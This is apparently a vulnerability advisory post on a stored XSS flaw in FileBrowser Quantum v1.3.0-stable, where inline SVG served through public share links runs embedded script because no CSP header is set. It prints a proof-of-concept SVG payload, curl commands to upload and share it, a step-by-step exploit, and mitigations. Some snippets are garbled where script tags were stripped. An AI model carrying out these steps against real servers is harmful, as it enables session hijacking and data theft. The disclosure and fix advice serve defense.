Listen to this Post
How the mentioned CVE works:
The vulnerability exists in FileBrowser Quantum v1.3.0-stable when serving inline SVG files via public share links. The endpoint `/public/api/resources/download?hash=HASH&inline=true` returns SVG data with `Content-Type: image/svg+xml` and Content-Disposition: inline. No `Content-Security-Policy` header is set, allowing embedded JavaScript inside the SVG to execute in the browser. An attacker with upload permission can create an SVG file containing a `` block. After generating a public share for that file, appending `?inline=true` to the share link forces inline rendering. Any visitor clicking that link will have the script executed in the context of the FileBrowser domain. This stored XSS persists because the malicious SVG remains on the server. The upstream project (filebrowser/filebrowser) mitigates this by sending Content-Security-Policy: script-src 'none', but FileBrowser Quantum omits this header. No authentication is required to trigger the payload; public share links are accessible to anyone. Session hijacking, phishing, and data theft are possible if an authenticated user clicks the link. The endpoint also lacks `X-Frame-Options` and `X-XSS-Protection` as defense-in-depth.
dailycve form:
Platform: FileBrowser Quantum
Version: v1.3.0-stable
Vulnerability: Stored XSS via SVG
Severity: Medium
date: 2026-05-07
Prediction: Expected patch by 2026-05-21
What Undercode Say:
Test for missing CSP header curl -I "https://target.example.com/public/api/resources/download?hash=TEST&inline=true" | grep -i "content-security-policy" Upload malicious SVG (requires login) cat > xss.svg <<EOF <svg xmlns="http://www.w3.org/2000/svg"> <script>alert(document.domain)</script> </svg> EOF curl -X POST -F "[email protected]" -H "Cookie: session=..." https://target.example.com/api/upload Create public share and extract link curl -X POST -H "Cookie: session=..." https://target.example.com/api/share -d '{"path":"/xss.svg"}' Trigger via inline parameter curl "https://target.example.com/public/share/HASH?inline=true" Fix (add CSP header in source) sed -i '/w.Header().Set("Content-Type", "image/svg+xml")/a w.Header().Set("Content-Security-Policy", "script-src '\''none'\''")' internal/file.go
Exploit:
1. Login as any user with upload permission.
2. Upload SVG file containing ``.
- Create public share for that file via the web UI or API.
- Obtain the share link (e.g., `https://victim/share/HASH`).
- Append `?inline=true` to the link and distribute it.
- Victim clicks link → script executes in their browser.
Protection from this CVE:
- Upgrade to a patched version once available (follow upstream fix).
- Manually add CSP header `script-src ‘none’` to inline download responses.
- Use reverse proxy to inject CSP: `add_header Content-Security-Policy “script-src ‘none'”;`
– Disable inline rendering for public shares (remove `&inline=true` support). - Sanitize uploaded SVG files by stripping `
Manage ConsentTo provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent may adversely affect certain features and functions.
We do not sell your personal data. If you wish to exercise your rights under applicable privacy laws, please visit our Do Not Sell My Personal Information page.
Functional Always activeThe technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.PreferencesThe technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.StatisticsThe technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.MarketingThe technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.